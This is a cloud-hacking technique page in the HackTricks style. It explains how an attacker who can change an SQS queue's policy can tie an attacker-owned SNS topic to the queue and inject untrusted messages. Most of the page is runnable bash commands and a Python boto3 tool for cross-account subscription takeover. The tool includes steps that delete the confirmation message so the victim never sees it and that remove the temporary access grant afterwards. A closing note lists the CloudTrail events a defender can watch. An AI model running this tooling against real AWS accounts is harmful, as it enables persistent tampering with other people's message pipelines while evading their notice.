AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Description

Abuse the resource policy of an SQS queue so that an attacker-controlled SNS topic is allowed to publish messages into the victim's queue. In the same account, an SQS subscription to an SNS topic is confirmed automatically; across accounts you must read the SubscriptionConfirmation token that SNS drops into the queue and pass it to ConfirmSubscription. The result is untrusted message injection into a queue whose downstream consumers may trust it implicitly.

Requirements

  • Ability to modify the resource policy of the target SQS queue: sqs:SetQueueAttributes on the victim queue.
  • Ability to create and publish to an attacker-controlled SNS topic: sns:CreateTopic, sns:Publish and sns:Subscribe in the attacker's account/topic.
  • Cross-account only: temporary sqs:ReceiveMessage on the victim queue to read the confirmation token (and sqs:DeleteMessage if you want to remove that message afterwards), plus sns:ConfirmSubscription to use it.

Same-account execution

```bash
REGION=us-east-1
# 1) Create the victim queue and capture its URL/ARN
Q_URL=$(aws sqs create-queue --queue-name ht-victim-q --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Create the attacker-controlled SNS topic
TOPIC_ARN=$(aws sns create-topic --name ht-attacker-topic --region $REGION --query TopicArn --output text)

# 3) Allow that SNS topic to publish to the queue (queue resource policy).
#    The aws:SourceArn condition scopes the grant to TOPIC_ARN only.
cat > /tmp/ht-sqs-sns-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSTopicPublish","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"REPLACE_QUEUE_ARN","Condition":{"StringEquals":{"aws:SourceArn":"REPLACE_TOPIC_ARN"}}}]}
JSON
sed -i.bak "s#REPLACE_QUEUE_ARN#$Q_ARN#g; s#REPLACE_TOPIC_ARN#$TOPIC_ARN#g" /tmp/ht-sqs-sns-policy.json
# The Policy attribute is itself a JSON string, so let jq do the escaping.
# (Pasting the escaped policy in with sed turns the \" and \n sequences back
# into real quotes/newlines and yields invalid JSON.) --rawfile needs jq >= 1.6.
jq -n --rawfile pol /tmp/ht-sqs-sns-policy.json '{Policy: $pol}' > /tmp/ht-attrs.json
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-attrs.json

# 4) Subscribe the queue to the topic (auto-confirmed because queue and topic share an account)
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION

# 5) Publish and verify the injection. Quote the message: an unquoted '>' is a shell redirect.
aws sns publish --topic-arn "$TOPIC_ARN" --message '{"pwn":"sns->sqs"}' --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All
```

Cross-account notes

  • The queue policy above must allow the foreign TOPIC_ARN (the one in the attacker's account); aws:SourceArn is matched against the full topic ARN, so the attacker's account ID ends up in the victim's queue policy.
  • Subscriptions are not auto-confirmed when topic and queue live in different accounts. Temporarily grant yourself sqs:ReceiveMessage on the victim queue (a second statement in the same queue policy is enough, since you already control it), read the SubscriptionConfirmation message from the queue, and call sns confirm-subscription with its Token. Delete the confirmation message afterwards so the victim's consumer never sees it, and remove the temporary read grant again.
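The cross-account flow described above (and summarised in the Description), written out as an added example that is not HackTricks' own code: the queue policy is built with the SNS publish statement plus a temporary read grant for the attacker principal, the victim queue is subscribed to the attacker topic, the SubscriptionConfirmation envelope is pulled off the queue, its Token is passed to ConfirmSubscription, and the read grant is dropped again. The boto3 clients are passed in rather than created, so the policy and envelope-parsing logic can be exercised offline against the constructed SAMPLE_RECEIVE_RESPONSE; the account IDs, ARNs, queue URL and attacker principal are placeholders.

```python
"""Cross-account SNS -> SQS subscription takeover helper.

Added example, not HackTricks' own code. Account 222222222222 (attacker) owns the
topic, account 111111111111 (victim) owns the queue; every ARN below is a placeholder.
The sqs client must carry credentials that hold sqs:SetQueueAttributes on the victim
queue (the compromised principal) and that are covered by the temporary read grant;
the sns client is the attacker's own.
"""
import json

VICTIM_QUEUE_ARN = "arn:aws:sqs:us-east-1:111111111111:ht-victim-q"
ATTACKER_TOPIC_ARN = "arn:aws:sns:us-east-1:222222222222:ht-attacker-topic"
ATTACKER_PRINCIPAL = "arn:aws:iam::222222222222:user/attacker"


def build_queue_policy(queue_arn, topic_arn, reader_principal_arn=None):
    """Queue resource policy: SNS may deliver from topic_arn only; optionally a
    temporary ReceiveMessage/DeleteMessage grant so the confirmation token can be read."""
    statements = [{
        "Sid": "AllowSNSTopicPublish",
        "Effect": "Allow",
        "Principal": {"Service": "sns.amazonaws.com"},
        "Action": "sqs:SendMessage",
        "Resource": queue_arn,
        # scoped to the attacker topic; without this any SNS topic could publish
        "Condition": {"StringEquals": {"aws:SourceArn": topic_arn}},
    }]
    if reader_principal_arn:
        statements.append({
            "Sid": "TempConfirmationRead",
            "Effect": "Allow",
            "Principal": {"AWS": reader_principal_arn},
            "Action": ["sqs:ReceiveMessage", "sqs:DeleteMessage"],
            "Resource": queue_arn,
        })
    return {"Version": "2012-10-17", "Statement": statements}


def extract_confirmation_token(receive_response, topic_arn):
    """Find the SNS SubscriptionConfirmation envelope for topic_arn in a ReceiveMessage
    response. Returns (token, receipt_handle), or (None, None) if it is not there yet."""
    for msg in receive_response.get("Messages", []):
        try:
            envelope = json.loads(msg.get("Body", ""))
        except ValueError:
            continue  # not JSON, e.g. the victim's own traffic
        if not isinstance(envelope, dict):
            continue
        if envelope.get("Type") == "SubscriptionConfirmation" and envelope.get("TopicArn") == topic_arn:
            return envelope.get("Token"), msg.get("ReceiptHandle")
    return None, None


def confirm_cross_account_subscription(sqs, sns, queue_url, queue_arn, topic_arn,
                                       reader_principal_arn, attempts=12):
    """Full flow. Returns the confirmed SubscriptionArn; raises if no token shows up."""
    # 1) queue policy: SNS publish grant + temporary read grant for us
    sqs.set_queue_attributes(QueueUrl=queue_url, Attributes={
        "Policy": json.dumps(build_queue_policy(queue_arn, topic_arn, reader_principal_arn))})
    # 2) cross-account subscribe: SNS drops a SubscriptionConfirmation into the queue
    sns.subscribe(TopicArn=topic_arn, Protocol="sqs", Endpoint=queue_arn)
    # 3) poll for the envelope and confirm with its token
    for _ in range(attempts):
        resp = sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=10, WaitTimeSeconds=10)
        token, handle = extract_confirmation_token(resp, topic_arn)
        if token:
            result = sns.confirm_subscription(TopicArn=topic_arn, Token=token)
            # don't leave the envelope for the victim's consumer to find
            sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=handle)
            # 4) drop the temporary read grant; only the SNS publish statement remains
            sqs.set_queue_attributes(QueueUrl=queue_url, Attributes={
                "Policy": json.dumps(build_queue_policy(queue_arn, topic_arn))})
            return result["SubscriptionArn"]
    raise RuntimeError("no SubscriptionConfirmation received for " + topic_arn)


# Constructed ReceiveMessage response (not captured from AWS): one unrelated victim
# message plus the SNS confirmation envelope for the attacker topic.
_TOKEN = "2336412f37fb687f5d51e6e2425ba1f1example"
SAMPLE_RECEIVE_RESPONSE = {"Messages": [
    {"MessageId": "m-1", "ReceiptHandle": "rh-1", "Body": '{"order_id": 42}'},
    {"MessageId": "m-2", "ReceiptHandle": "rh-2", "Body": json.dumps({
        "Type": "SubscriptionConfirmation",
        "TopicArn": ATTACKER_TOPIC_ARN,
        "Token": _TOKEN,
        "SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription"
                        "&TopicArn=" + ATTACKER_TOPIC_ARN + "&Token=" + _TOKEN,
    })},
]}


if __name__ == "__main__":  # live run; assumes boto3 and suitable credentials in the environment
    import boto3
    queue_url = "https://sqs.us-east-1.amazonaws.com/111111111111/ht-victim-q"  # placeholder
    print(confirm_cross_account_subscription(boto3.client("sqs"), boto3.client("sns"), queue_url,
                                             VICTIM_QUEUE_ARN, ATTACKER_TOPIC_ARN, ATTACKER_PRINCIPAL))
```

The token extraction deliberately filters on both Type and TopicArn: a busy victim queue will also contain legitimate messages and possibly SNS envelopes from the victim's own topics, and confirming the wrong token does nothing useful. Removing the TempConfirmationRead statement at the end keeps the persisted change down to the single SNS statement, which is what a defender would have to spot in the queue policy.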

Impact

Potential impact: persistent injection of unsolicited messages into a trusted SQS queue via SNS, leading to unintended processing, data pollution, or abuse of downstream workflows. Unless the subscription is created with RawMessageDelivery enabled, each injected payload arrives wrapped in the SNS notification envelope (Type, TopicArn, Message, ...), so a consumer that checks TopicArn would notice the foreign topic, while one that only reads Message would not. On the defender's side, the CloudTrail events to watch are SetQueueAttributes calls that change a queue Policy, and Subscribe/ConfirmSubscription calls whose SQS endpoint belongs to a different account than the topic.
